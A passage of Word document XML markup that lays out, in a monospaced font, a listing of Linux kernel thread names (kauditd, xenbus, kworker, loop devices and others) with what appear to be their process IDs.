    <w:p w14:paraId="200FD644" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AAAF2D"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.[kdevtmpfs]         13                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9BBE5B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0F1A08"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.[netns]             14                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E25FC1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20665FBA"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.[rcu_tasks_kthre]   15                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E805FE0" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12732C9A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">.[kauditd]           16                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB22BE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6782D51A"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.[xenbus]            17                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A08AFE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21363963"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.[xenwatch]          18                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01266A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384456DE"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.[khungtaskd]        20                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692B78D0" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C55C90"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.[oom_reaper]        21                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6A844" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7CD8F4"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.[writeback]         22                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37321757" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369BDDE9"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.[kcompactd0]        23                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B627E5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149D023F"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.[ksmd]              24                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42253403" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666BF31E"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.[khugepaged]        25                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28493D4B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565AA3A2"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.[crypto]            26                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC136CC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E44609B"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.[kintegrityd]       27                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FEDB3" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503B0395"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.[kblockd]           28                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2ED1B4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03054CEA"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.[ata_sff]           29                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212FD2E4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D64620E"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.[md]                30                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA28E7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F12A402"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.[edac-poller]       31                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC008F8" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592AA0F0"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.[devfreq_wq]        32                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425173E" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536D0A94"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.[watchdogd]         33                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF976D3" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193B9F1E"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.[kswapd0]           36                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36503333" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F540317"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.[ecryptfs-kthrea]   37                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC90E5C" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75073DE1"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.[kthrotld]          79                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538A94D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DDC73E"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.[nvme-wq]           80                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3CC8F" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24315B95"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.[scsi_eh_0]         81                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B5EC4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1493369A"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.[scsi_tmf_0]        82                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF76B8" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA272C1"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.[scsi_eh_1]         83                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A51E1" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69195AE2"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.[scsi_tmf_1]        84                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63E0D4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC08B36"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.[ipv6_addrconf]     89                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB518C7" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A95ACD"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.[kstrp]             99                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14847C90" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="690D4F8C"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.[kworker/0:1H]      100                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB53DD" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB1AF56"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.[raid5wq]           280                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD1DEC" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A04B49"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.[jbd2/xvda1-8]      330                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E31E25D" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D750F94"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.[ext4-rsv-conver]   331                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5FEE6" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE3755C"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.[iscsi_eh]          395                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D093CB" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071A2709"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.[ib-comp-wq]        408                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2D591" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11584B3B"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.[ib_mcast]          409                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71882192" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034ACA70"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.[ib_nl_sa_wq]       410                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7CCEA9" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6744E069"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.[rdma_cm]           415                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6510DD2B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5861FF0D"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.[loop0]             951                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301A82A" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42827D93"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.[loop1]             1103                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D4288" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231840CD"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.[xfsalloc]          10374                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E04C5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747ACE7D"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.[xfs_mru_cache]     10375                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9B73B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26507F55"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.[loop2]             6189                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30574A95" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7931A556"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.[loop3]             6349                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD506D4" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A0BCB2"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.[kworker/0:0]       19056                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73BE8B" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3173B43C"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.[kworker/u30:2]     19454                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561B7EE" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED624C9"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.[kworker/0:1]       19709                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA12B5" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384E00D5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">.[kworker/u30:1]     20781                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C7D26" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
